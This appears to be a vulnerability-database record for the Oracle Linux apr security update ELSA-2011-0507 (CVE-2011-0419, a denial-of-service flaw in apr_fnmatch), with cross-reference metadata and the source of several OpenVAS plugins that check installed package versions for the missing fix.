apr security update

2011-05-11T00:00:00

Description

[1.3.9-3.1] - add fix for CVE-2011-0419 (#703520)

{"id": "ELSA-2011-0507", "type": "oraclelinux", "bulletinFamily": "unix", "title": "apr security update", "description": "[1.3.9-3.1]\n- add fix for CVE-2011-0419 (#703520)", "published": "2011-05-11T00:00:00", "modified": "2011-05-11T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "href": "http://linux.oracle.com/errata/ELSA-2011-0507.html", "reporter": "Oracle", "references": [], "cvelist": ["CVE-2011-0419"], "immutableFields": [], "lastseen": "2019-05-29T18:35:17", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "centos", "idList": ["CESA-2011:0507", "CESA-2011:0844"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2011-111", "CPAI-2011-371"]}, {"type": "cve", "idList": ["CVE-2011-0419", "CVE-2011-1928"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2237-1:B31B9", "DEBIAN:DSA-2237-1:D93A8", "DEBIAN:DSA-2237-2:0F0D8", "DEBIAN:DSA-2237-2:A14B0"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-0419", "DEBIANCVE:CVE-2011-1928"]}, {"type": "exploitdb", "idList": ["EDB-ID:35738"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FDCB3D93694E48CD5EE27CE55D6801DE"]}, {"type": "f5", "idList": ["F5:K16879", "SOL15920", "SOL16879"]}, {"type": "fedora", "idList": ["FEDORA:543461106DB", "FEDORA:6D8821108F8", "FEDORA:A418B218C9", "FEDORA:EB5D1110667", "FEDORA:EDD52110916"]}, {"type": "freebsd", "idList": ["00B296B6-7DB1-11E0-96B7-00300582F9FC", "38560D79-0E42-11E1-902B-20CF30E32F6D", "99A5590C-857E-11E0-96B7-00300582F9FC"]}, {"type": "gentoo", "idList": ["GLSA-201405-24"]}, {"type": "hackerone", "idList": ["H1:184877"]}, {"type": "httpd", "idList": ["HTTPD:B821541A5FE3011C9F886A2768987864", "HTTPD:C730B9155CAC64B44A77E253B3135FE5"]}, {"type": "kaspersky", "idList": ["KLA10065"]}, {"type": "nessus", "idList": ["APACHE_2_2_18.NASL", "CENTOS_RHSA-2011-0507.NASL", "CENTOS_RHSA-2011-0844.NASL", "DEBIAN_DSA-2237.NASL", "F5_BIGIP_SOL15920.NASL", "FEDORA_2011-6750.NASL", "FEDORA_2011-6918.NASL", "FEDORA_2011-7340.NASL", "FREEBSD_PKG_00B296B67DB111E096B700300582F9FC.NASL", "FREEBSD_PKG_38560D790E4211E1902B20CF30E32F6D.NASL", "FREEBSD_PKG_99A5590C857E11E096B700300582F9FC.NASL", "GENTOO_GLSA-201405-24.NASL", "HPSMH_7_0_0_24.NASL", "JUNIPER_NSM_JSA10642.NASL", "MACOSX_SECUPD2011-006.NASL", "MANDRIVA_MDVSA-2011-084.NASL", "MANDRIVA_MDVSA-2011-095.NASL", "ORACLELINUX_ELSA-2011-0507.NASL", "ORACLELINUX_ELSA-2011-0844.NASL", "ORACLE_HTTP_SERVER_CPU_JUL_2013.NASL", "REDHAT-RHSA-2011-0507.NASL", "REDHAT-RHSA-2011-0844.NASL", "SLACKWARE_SSA_2011-133-01.NASL", "SL_20110511_APR_ON_SL4_X.NASL", "SL_20110531_APR_ON_SL4_X.NASL", "SL_20110531_APR_ON_SL6_X.NASL", "SOLARIS10_147713-01.NASL", "SOLARIS10_X86_147714-01.NASL", "SUSE_11_3_APACHE2-110726.NASL", "SUSE_11_4_APACHE2-110726.NASL", "SUSE_11_LIBAPR-UTIL1-110701.NASL", "SUSE_11_LIBAPR-UTIL1-110706.NASL", "SUSE_LIBAPR-UTIL1-7611.NASL", "SUSE_LIBAPR1-7610.NASL", "UBUNTU_USN-1134-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121199", "OPENVAS:1361412562310122176", "OPENVAS:136141256231069734", "OPENVAS:136141256231069737", "OPENVAS:136141256231069762", "OPENVAS:136141256231069767", "OPENVAS:136141256231070602", "OPENVAS:136141256231071948", "OPENVAS:1361412562310802336", "OPENVAS:1361412562310802337", "OPENVAS:1361412562310831393", "OPENVAS:1361412562310831404", "OPENVAS:1361412562310831409", "OPENVAS:1361412562310840667", "OPENVAS:1361412562310863121", "OPENVAS:1361412562310863124", "OPENVAS:1361412562310863252", "OPENVAS:1361412562310863756", "OPENVAS:1361412562310870432", "OPENVAS:1361412562310870435", "OPENVAS:1361412562310880490", "OPENVAS:1361412562310880491", "OPENVAS:1361412562310880541", "OPENVAS:1361412562310880563", "OPENVAS:1361412562310881249", "OPENVAS:1361412562310881265", "OPENVAS:1361412562310881291", "OPENVAS:1361412562310881329", "OPENVAS:69734", "OPENVAS:69737", "OPENVAS:69762", "OPENVAS:69767", "OPENVAS:70602", "OPENVAS:71948", "OPENVAS:802336", "OPENVAS:802337", "OPENVAS:831393", "OPENVAS:831404", "OPENVAS:831409", "OPENVAS:840667", "OPENVAS:863121", "OPENVAS:863124", "OPENVAS:863252", "OPENVAS:863756", "OPENVAS:870432", "OPENVAS:870435", "OPENVAS:880490", "OPENVAS:880491", "OPENVAS:880541", "OPENVAS:880563", "OPENVAS:881249", "OPENVAS:881265", "OPENVAS:881291", "OPENVAS:881329"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2012-392727", "ORACLE:CPUJULY2013-1899826"]}, {"type": "osv", "idList": ["OSV:DSA-2237-2"]}, {"type": "redhat", "idList": ["RHSA-2011:0507", "RHSA-2011:0844", "RHSA-2011:0897"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26370", "SECURITYVULNS:DOC:26373", "SECURITYVULNS:DOC:26381", "SECURITYVULNS:DOC:27155", "SECURITYVULNS:VULN:11676", "SECURITYVULNS:VULN:11973", "SECURITYVULNS:VULN:12672", "SECURITYVULNS:VULN:13214"]}, {"type": "seebug", "idList": ["SSV:20555"]}, {"type": "slackware", "idList": ["SSA-2011-133-01"]}, {"type": "suse", "idList": ["SUSE-SU-2011:1229-1"]}, {"type": "ubuntu", "idList": ["USN-1134-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-0419", "UB:CVE-2011-1928"]}, {"type": "veracode", "idList": ["VERACODE:24600", "VERACODE:24725"]}]}, "score": {"value": 1.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2011:0507", "CESA-2011:0844"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2011-111"]}, {"type": "cve", "idList": ["CVE-2011-0419"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2237-1:D93A8"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FDCB3D93694E48CD5EE27CE55D6801DE"]}, {"type": "f5", "idList": ["SOL15920", "SOL16879"]}, {"type": "fedora", "idList": ["FEDORA:6D8821108F8"]}, {"type": "freebsd", "idList": ["00B296B6-7DB1-11E0-96B7-00300582F9FC", "38560D79-0E42-11E1-902B-20CF30E32F6D", "99A5590C-857E-11E0-96B7-00300582F9FC"]}, {"type": "gentoo", "idList": ["GLSA-201405-24"]}, {"type": "httpd", "idList": ["HTTPD:C730B9155CAC64B44A77E253B3135FE5"]}, {"type": "kaspersky", "idList": ["KLA10065"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/GENTOO-LINUX-CVE-2011-0419/"]}, {"type": "nessus", "idList": ["APACHE_2_2_18.NASL", "SUSE_11_3_APACHE2-110726.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310831393", "OPENVAS:1361412562310831409", "OPENVAS:1361412562310870435", "OPENVAS:70602", "OPENVAS:880490", "OPENVAS:880541"]}, {"type": "oracle", "idList": ["ORACLE:CPUJULY2013-1899826"]}, {"type": "redhat", "idList": ["RHSA-2011:0507"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26370", "SECURITYVULNS:DOC:26373"]}, {"type": "seebug", "idList": ["SSV:20555"]}, {"type": "slackware", "idList": ["SSA-2011-133-01"]}, {"type": "suse", "idList": ["SUSE-SU-2011:1229-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-0419"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2011-0419", "epss": "0.973990000", "percentile": "0.998300000", "modified": "2023-03-13"}], "vulnersScore": 1.5}, "affectedSoftware": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659994789, "score": 1683811507, "epss": 1678780816}, "_internal": {"score_hash": "9b1cd1f76e10cdef519e2c5f72f9edc9"}}

{"openvas": [{"lastseen": "2019-05-29T18:36:39", "description": "Oracle Linux Local Security Checks ELSA-2011-0507", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-0507", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122176", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122176", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-0507.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122176\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:14:17 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-0507\");\n script_tag(name:\"insight\", value:\"ELSA-2011-0507 - apr security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-0507\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-0507.html\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.9~3.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.3.9~3.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-27T10:55:13", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "RedHat Update for apr RHSA-2011:0507-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870432", "href": "http://plugins.openvas.org/nasl.php?oid=870432", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for apr RHSA-2011:0507-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n \n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\n\ntag_affected = \"apr on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-May/msg00011.html\");\n script_id(870432);\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"RHSA\", value: \"2011:0507-01\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"RedHat Update for apr RHSA-2011:0507-01\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~25.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~0.9.4~25.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~25.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:51", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880541", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880541", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-May/017555.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880541\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0507\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"apr on CentOS 5\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:35", "description": "The remote host is missing an update to apr\nannounced via advisory DSA 2237-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2237-1 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231069734", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069734", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2237_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2237-1 (apr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69734\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 2237-1 (apr)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202237-1\");\n script_tag(name:\"insight\", value:\"A flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze1.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.4-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.4-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your apr packages and restart the\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to apr\nannounced via advisory DSA 2237-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.2.12-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.2.12-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.2.12-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.2-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.2-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.4-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.4-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.4-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881249", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881249", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-May/017553.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881249\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:11:51 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0507\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"apr on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n 